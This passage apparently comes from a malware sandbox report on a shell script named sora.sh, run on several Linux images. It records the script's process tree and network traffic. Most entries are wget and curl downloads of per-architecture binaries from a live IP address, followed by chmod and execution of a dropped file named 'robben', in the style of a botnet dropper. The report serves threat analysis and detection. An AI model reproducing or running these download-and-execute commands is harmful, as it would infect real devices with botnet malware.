/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsel-20240611-en

Max time kernel

247s

Max time network

281s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

290s

Max time network

298s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 158.51.127.106:80 tcp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.96:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 daisy.ubuntu.com udp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

223s

Max time network

292s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-timedated.service-HCpxDg systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.17:80 connectivity-check.ubuntu.com tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A